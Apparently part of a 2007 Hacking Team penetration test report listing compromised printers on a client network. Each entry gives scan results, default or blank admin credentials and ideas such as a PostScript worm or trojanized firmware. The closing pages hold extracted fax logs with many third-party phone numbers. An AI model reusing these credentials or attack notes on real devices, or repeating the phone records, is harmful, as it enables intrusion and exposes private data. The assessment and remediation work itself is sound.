Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4250
Hostname HP_BLACK_PPF_B2C
Compromised Compromised Directly Info Admin with no password
Auth http://100.100.200.47/
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
280/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 319 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
443/tcp open ssl/http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
515/tcp open printer
631/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
9100/tcp open jetdirect?
Uptime: 30.719 days (since Wed Jun 13 15:54:29 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this might lead to DoS and
Information Disclosure.
6.18.2 100.100.200.48 [Compromised]
Rating: compromised
Vulnerabilities found: V2
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4250
Hostname HP_BLACK_PPF_AUDITING
Compromised Compromised Directly Info Admin with no password
Auth http://100.100.200.48/
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
80/tcp open http?
280/tcp open http-mgmt?
443/tcp open ssl/http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
515/tcp open printer
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 320 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
631/tcp open ipp?
9100/tcp open jetdirect?
Uptime: 30.600 days (since Wed Jun 13 18:46:54 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.3 100.100.200.49 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4250
Hostname HP_BLACK_PPF_OPERATIONS2
Compromised Compromised Directly Info Admin with no password
Auth http://100.100.200.49/
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
280/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
443/tcp open ssl/http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
515/tcp open printer
631/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
9100/tcp open jetdirect?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 321 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Uptime: 37.732 days (since Wed Jun 6 15:38:07 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this might lead to DoS and
Information Disclosure.
6.18.4 100.100.200.50 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 2300
Hostname NPIF50F50
Compromised Compromised Directly Info Admin with no password
Auth http://100.100.200.50/
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
280/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
443/tcp open ssl/http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
515/tcp open printer
631/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
9100/tcp open jetdirect?
Uptime: 3.670 days (since Tue Jul 10 17:07:14 2007)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 322 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=154 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.5 100.100.200.52 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4100
Hostname HELPDESK_HP_SMS
Compromised Compromised Directly Info Admin with no password
Auth http://100.100.200.52/
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
280/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
515/tcp open printer
631/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 323 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Service Info: Devices: print server, printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.6 100.100.200.53 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; update firmare/OS to the latest available release; replace telnet access
with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4100
Hostname Not detected
Compromised Compromised Directly Info Admin with no password
Auth http://100.100.200.53/
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
280/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
515/tcp open printer
631/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 324 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.7 100.100.200.56 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V7
Risk state: high
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; check the authorization system of the printer to prevent information
disclosure of sensible data like phonebook
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Xerox Version WorkCentre PE120 Series
Hostname XRX0000F0AC5FD6
Compromised Compromised Directly Info Weak password
Auth http://admin:[email protected]/
The host was alive and these additional information could be extracted:
80/tcp open tcpwrapped
427/tcp open svrloc?
515/tcp open printer?
631/tcp open ipp?
2000/tcp open callbook?
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=17 (Good luck!)
IPID Sequence Generation: Incremental
The printer supports PostScript scripts, a worm can be developed using such language.
A script can be crafted to periodically download the information provided by the printer about users,
prints, faxes and phone numbers.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 325 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
A user can print from the web interface.
A phonebook is available at the address http://100.100.200.56/phonebook.csv, leading to
Information Disclosure.
The printer supports a Firmware upgrade function that permits an attacker to load a trojanized
firmware and acquiring even more power on the device.
It was possible to login in the Xerox Web Admin by tying a default password set.
6.18.8 100.100.200.57 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; update firmare/OS to the latest available release; replace telnet access
with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4200
Hostname HPLASERJET4200SMS
Compromised Compromised Directly Info Admin with no password
Auth http://100.100.200.57/
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
280/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
443/tcp open ssl/http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
515/tcp open printer
631/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
9100/tcp open jetdirect?
Uptime: 1.856 days (since Thu Jul 12 12:45:54 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 326 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.9 100.100.200.58 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; update firmare/OS to the latest available release; replace telnet access
with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Netgear Version 04D0468C28 6031
Hostname Not detected
Compromised Compromised Directly Info No authentication
Auth http://100.100.200.58/
The host was alive and these additional information could be extracted:
21/tcp open ftp?
23/tcp open telnet Micronet or Linksys print server telnetd
80/tcp open http Netgear print server http config (PRINT_SERVER WEB
httpd 1.0)
139/tcp open netbios-ssn?
515/tcp open printer?
631/tcp open http Netgear print server http config (PRINT_SERVER WEB
httpd 1.0)
9100/tcp open jetdirect?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 327 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IPID Sequence Generation: Incremental
Service Info: Devices: Print Server, print server
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.10 100.100.200.59 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V7
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; check the authorization system of the printer to prevent information
disclosure of sensitive data like the phonebook
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Xerox Version WorkCentre M20i
Hostname XRX0000F0A7BD20
Compromised Compromised Directly Info Weak password
Auth http://Admin:[email protected]/
The host was alive and these additional information could be extracted:
68/tcp filtered dhcpc
80/tcp open tcpwrapped
427/tcp open svrloc?
515/tcp open printer?
631/tcp open tcpwrapped
2000/tcp open callbook?
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=17 (Good luck!)
IPID Sequence Generation: Incremental© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 328 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The printer supports PostScript scripts, a worm can be developed using such language.
A script can be crafted to periodically download the information provided by the printer about users,
prints, faxes and phone numbers.
A user can print from the web interface.
A phonebook is available at the address http://100.100.200.59/phonebook.csv, leading to
Information Disclosure.
The printer supports a Firmware upgrade function that permits an attacker to load a trojanized
firmware and acquiring even more power on the device.
It was possible to login in the Xerox Web Admin by tying a default password set.
6.18.11 100.100.200.249 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: high
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet P3005
Hostname NPI90E4DA
Compromised Compromised Directly Info Admin with no password
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp?
23/tcp open telnet HP JetDirect telnetd
80/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
280/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
443/tcp open ssl/http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
515/tcp open printer
631/tcp open http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 329 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
9100/tcp open jetdirect?
Uptime: 9.683 days (since Wed Jul 4 17:48:32 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Device: printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
The printer supports a Firmware upgrade function that permits an attacker to load a trojanized
firmware and acquiring even more power on the device.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.12 100.100.200.250 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; update firmare/OS to the latest available release
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Xerox Version Phaser 8500
Hostname PHASER 8500N
Compromised Compromised Directly Info Admin with no password
Auth Not needed
The host was alive and these additional information could be extracted:
21/tcp open ftp Phaser printer ftpd
80/tcp open http Xerox printer webadmin (Printer 8500N; Embedded
Allegro-Software-RomPager 4.30)
427/tcp open svrloc?
443/tcp open ssl/http Xerox printer webadmin (Printer 8500N; Embedded
Allegro-Software-RomPager 4.30)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 330 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
515/tcp open printer
631/tcp open http Xerox printer webadmin (Printer 8500N; Embedded
Allegro-Software-RomPager 4.30)
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Device: printer
Using the administration panel it's possible to define some urls to help users download drivers and
contact assistence, this can be used in Social Engineering attacks.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.18.13 100.100.200.251 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V7
Risk state: high
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; check the printer authorization system to prevent information
disclosure of sensitive data like the last fax sents, senders data, phone numbers, etc.
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Canon Version IR3045 - Canon Network Multi-PDL
Printer Board-D1/H1
Hostname IR3045
Compromised Compromised Directly Info Admin with no password
Auth Not needed
The host was alive and these additional information could be extracted:
80/tcp open ipp Canon printer web interface 2.21
443/tcp open ssl/ipp Canon printer web interface 2.21
515/tcp open printer
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 331 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
631/tcp open ipp?
8000/tcp open http-alt?
8443/tcp open ssl/unknown
9100/tcp open jetdirect?
Uptime: 26.356 days (since Mon Jun 18 01:43:49 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IPID Sequence Generation: Incremental
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
The administration panel has privacy and data leak issues that can be used in social engineering
attacks:
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 21:58:53 GMT
Server: CANON HTTP Server Ver2.21
Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro (Rif. n. lavoro)","Risultato","Utente","ID divisione","Modo","Ora inizio","Tempo di
utilizzo","Destinazione","Originali","Pagine originale","Invio pagine","Codice fine"
428,"OK","",,"Invio",13/07 2007 15:21:12,3'51,"00287937118","3","3","3","OK"
427,"OK","",,"Invio",13/07 2007 14:52:07,8'43,"00248020298","6","6","6","OK"
427,"NG","",,"Invio",13/07 2007 14:47:31,1'50,"00248020298","6","6","1",""
426,"OK","",,"Invio",13/07 2007 14:40:44,0'45,"00677726527","1","1","1","OK"
425,"NG","",,"Invio",13/07 2007 12:31:23,0'00,"00677726527","1","1","0","#018"
424,"NG","",,"Invio",13/07 2007 12:30:07,0'00,"008119362144","1","1","0","#018"
423,"OK","",,"Invio",13/07 2007 12:20:35,0'53,"00226884430","1","1","1","OK"
422,"OK","",,"Invio",13/07 2007 12:18:54,1'14,"00171449344","1","1","1","OK"
421,"NG","",,"Invio",13/07 2007 12:19:42,0'00,"00773690294","2","2","2","#995"
420,"OK","",,"Invio",13/07 2007 12:12:01,4'47,"00267074101","1","1","1","OK"
419,"OK","",,"Invio",13/07 2007 12:08:52,2'32,"00295330726","1","1","1","OK"
417,"OK","",,"Invio",13/07 2007 12:06:57,0'48,"00557953184","1","1","1","OK"
418,"OK","",,"Invio",13/07 2007 12:04:36,1'45,"00823502079","1","1","1","OK"
414,"NG","",,"Invio",13/07 2007 12:03:21,0'00,"00677726527","1","1","0","#018"
416,"OK","",,"Invio",13/07 2007 11:59:51,1'30,"00864210827","1","1","1","OK"
415,"OK","",,"Invio",13/07 2007 11:57:16,0'55,"00270039910","1","1","1","OK"
413,"OK","",,"Invio",13/07 2007 11:55:15,1'38,"00647839257","1","1","1","OK"
412,"OK","",,"Invio",13/07 2007 11:50:59,3'46,"00313301837","1","1","1","OK"
411,"OK","",,"Invio",13/07 2007 11:47:21,1'36,"0050970654","2","2","2","OK"
408,"NG","",,"Invio",13/07 2007 11:46:12,0'35,"008119362144","1","1","0",""
412,"NG","",,"Invio",13/07 2007 11:41:10,3'18,"00313301837","1","1","1",""
410,"OK","",,"Invio",13/07 2007 11:34:19,3'53,"00697656464","2","2","2","OK"
409,"OK","",,"Invio",13/07 2007 11:33:01,0'50,"00685301174","1","1","1","OK"
407,"OK","",,"Invio",13/07 2007 11:27:31,3'51,"00742320301","2","2","2","OK"
406,"OK","",,"Invio",13/07 2007 11:19:06,1'50,"00270059854","2","2","2","OK"
404,"OK","",,"Invio",11/07 2007 15:35:38,4'16,"00038521222519","1","1","1","OK"
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 332 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
403,"OK","",,"Invio",11/07 2007 12:36:08,0'45,"00302002765","1","1","1","OK"
402,"NG","",,"Invio",11/07 2007 11:28:07,0'00,"00735583510","1","1","0","#018"
401,"NG","",,"Invio",11/07 2007 10:55:07,0'00,"0024043326","1","1","0","#018"
400,"NG","",,"Invio",11/07 2007 10:44:07,0'00,"0024043326","1","1","0","#018"
400,"NG","",,"Invio",11/07 2007 10:33:06,8'04,"0024043326","1","1","1",""
399,"OK","",,"Invio",10/07 2007 13:12:12,1'57,"00287937118","2","2","2","OK"
398,"OK","",,"Invio",09/07 2007 17:32:56,3'28,"00362367026","3","3","3","OK"
397,"OK","",,"Invio",09/07 2007 09:53:19,1'54,"00038521222519","1","1","1","OK"
396,"OK","",,"Invio",06/07 2007 11:45:41,1'11,"0800900150","1","1","1","OK"
394,"OK","",,"Invio",05/07 2007 11:14:01,0'37,"00221722233","1","1","1","OK"
393,"OK","",,"Invio",05/07 2007 09:51:03,3'21,"00280688287","2","2","2","OK"
392,"OK","",,"Invio",04/07 2007 15:53:41,0'40,"00229406965","2","2","2","OK"
390,"OK","",,"Invio",03/07 2007 17:32:08,0'20,"0800910028","1","1","1","OK"
389,"OK","",,"Invio",03/07 2007 16:26:14,0'53,"00642120200","1","1","1","OK"
388,"OK","",,"Invio",03/07 2007 10:58:59,1'31,"0800654415","2","2","2","OK"
387,"OK","",,"Invio",02/07 2007 17:39:39,1'07,"00233000083","2","2","2","OK"
385,"OK","",,"Invio",29/06 2007 11:42:52,2'14,"00277005365","8","8","8","OK"
384,"OK","",,"Invio",28/06 2007 16:06:34,1'33,"00280235200","2","2","2","OK"
382,"OK","",,"Invio",27/06 2007 10:47:04,0'35,"002781896","3","3","3","OK"
381,"OK","",,"Invio",26/06 2007 16:03:29,1'48,"00642120200","2","2","2","OK"
378,"OK","",,"Invio",21/06 2007 16:54:49,3'56,"00229515384","3","3","3","OK"
377,"OK","",,"Invio",21/06 2007 16:09:50,1'23,"00223995195","3","3","3","OK"
376,"NG","",,"Invio",21/06 2007 15:57:07,0'00,"00223995195","3","3","0","#018"
374,"OK","",,"Invio",21/06 2007 14:52:39,0'37,"00317379377","2","2","2","OK"
372,"OK","",,"Invio",20/06 2007 17:37:23,0'50,"00264152432","2","2","2","OK"
371,"OK","",,"Invio",20/06 2007 17:35:50,1'05,"InfoKlix - Milena","3","3","3","OK"
370,"OK","",,"Invio",20/06 2007 17:30:03,1'17,"00221722302","4","4","4","OK"
367,"OK","",,"Invio",19/06 2007 14:58:36,1'08,"00273954740","2","2","2","OK"
365,"OK","",,"Invio",18/06 2007 15:12:21,0'46,"00642120200","1","1","1","OK"
361,"OK","",,"Invio",15/06 2007 12:21:51,0'24,"000496995664365","1","1","1","OK"
360,"OK","",,"Invio",14/06 2007 11:24:07,1'09,"00642120200","1","1","1","OK"
359,"NG","",,"Invio",14/06 2007 11:20:10,0'00,"00642120200","1","1","1","#995"
359,"NG","",,"Invio",14/06 2007 11:14:07,1'33,"00642120200","1","1","1",""
358,"OK","",,"Invio",13/06 2007 17:00:41,9'44,"00248012728","10","10","10","OK"
355,"OK","",,"Invio",12/06 2007 13:16:06,0'24,"000496995668779","1","1","1","OK"
354,"NG","",,"Invio",12/06 2007 13:07:09,0'00,"0004906995668779","1","1","0","#018"
353,"NG","",,"Invio",12/06 2007 13:04:24,0'00,"00049695668779","1","1","0","#018"
352,"NG","",,"Invio",12/06 2007 12:56:07,0'00,"0006995668779","1","1","0","#018"
350,"OK","",,"Invio",11/06 2007 16:46:31,2'22,"0031520120","2","2","2","OK"
348,"OK","",,"Invio",07/06 2007 16:31:48,0'55,"00248591933","1","1","1","OK"
347,"OK","",,"Invio",06/06 2007 11:44:45,0'30,"00229530448","2","2","2","OK"
342,"OK","",,"Invio",04/06 2007 14:43:25,0'45,"InfoKlix - Milena","2","2","2","OK"
339,"OK","",,"Invio",04/06 2007 14:22:38,20'18,"00221722702","15","15","15","OK"
338,"OK","",,"Invio",04/06 2007 11:58:22,2'35,"00182470752","5","5","5","OK"
337,"OK","",,"Invio",04/06 2007 11:46:07,10'27,"0050703136","11","11","11","OK"
336,"OK","",,"Invio",04/06 2007 11:05:58,0'54,"00233000083","2","2","2","OK"
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 02:48:53 GMT
Server: CANON HTTP Server Ver2.21
Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro (Rif. n. lavoro)","Risultato","Utente","ID divisione","Modo","Ora inizio","Tempo di
utilizzo","Destinazione","Originali","Pagine originale","Pagine","Codice fine"
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 333 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
5082,"OK","",,"RX automatica",12/07 2007 12:16:21,0'29,"+39 0105794202",-,-,1,"OK"
5081,"OK","",,"RX automatica",11/07 2007 13:08:00,0'18,"00390280235200",-,-,1,"OK"
5080,"OK","",,"RX automatica",11/07 2007 12:22:55,0'49,"Sconosciuto",-,-,1,"OK"
5079,"OK","",,"RX automatica",10/07 2007 17:41:21,0'29,"++39 0288107507",-,-,1,"OK"
5078,"OK","",,"RX automatica",10/07 2007 16:15:43,0'24,"+39 02 30323228",-,-,1,"OK"
5077,"OK","",,"RX automatica",10/07 2007 13:14:28,0'47,"++39 0288107507",-,-,2,"OK"
5076,"OK","",,"RX automatica",09/07 2007 11:44:55,0'30,"+39 02 3390651",-,-,1,"OK"
5075,"OK","",,"RX automatica",09/07 2007 10:02:51,0'38,"00390642120200",-,-,3,"OK"
5074,"NG","",,"RX automatica",09/07 2007 09:58:21,0'45,"Sconosciuto",0,0,0,"#005"
5073,"OK","",,"RX automatica",07/07 2007 19:43:57,3'05,"00218213337771",-,-,3,"OK"
5072,"OK","",,"RX automatica",05/07 2007 14:49:26,0'22,"028372544",-,-,2,"OK"
5071,"OK","",,"RX automatica",03/07 2007 11:14:44,0'54,"0808915140",-,-,3,"OK"
5070,"OK","",,"RX automatica",29/06 2007 13:37:15,0'33,"Sconosciuto",-,-,3,"OK"
5069,"OK","",,"RX automatica",29/06 2007 11:36:10,1'21,"0434 24 30 33 ",-,-,1,"OK"
5068,"OK","",,"RX automatica",28/06 2007 15:35:41,1'06,"0039 541 28794",-,-,1,"OK"
5067,"OK","",,"RX automatica",22/06 2007 12:53:42,0'45,"0221722310",-,-,2,"OK"
5066,"OK","",,"RX automatica",19/06 2007 11:26:54,0'25,"0234531194",-,-,1,"OK"
5065,"OK","",,"RX automatica",18/06 2007 10:14:20,0'41,"0248517364",-,-,1,"OK"
5064,"OK","",,"RX automatica",15/06 2007 16:15:24,0'41,"Sconosciuto",-,-,2,"OK"
5063,"OK","",,"RX automatica",15/06 2007 09:49:46,1'06,"0039 541 28794",-,-,1,"OK"
5062,"OK","",,"RX automatica",14/06 2007 15:49:57,0'28,"02074009771",-,-,2,"OK"
5061,"OK","",,"RX automatica",13/06 2007 19:01:25,0'32,"02074009771",-,-,2,"OK"
5060,"OK","",,"RX automatica",11/06 2007 13:18:37,0'50,"020 7434 2900",-,-,1,"OK"
5059,"OK","",,"RX automatica",11/06 2007 10:33:12,1'12,"031520120",-,-,3,"OK"
5058,"OK","",,"RX automatica",07/06 2007 10:34:44,0'18,"00390221722302",-,-,1,"OK"
5057,"OK","",,"RX automatica",06/06 2007 22:04:43,0'27,"0182470752",-,-,1,"OK"
5056,"OK","",,"RX automatica",05/06 2007 14:35:51,0'56,"0390288622761",-,-,1,"OK"
5055,"OK","",,"RX automatica",04/06 2007 09:38:43,0'23,"0039 02 65530643",-,-,1,"OK"
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 02:48:49 GMT
Server: CANON HTTP Server Ver2.21
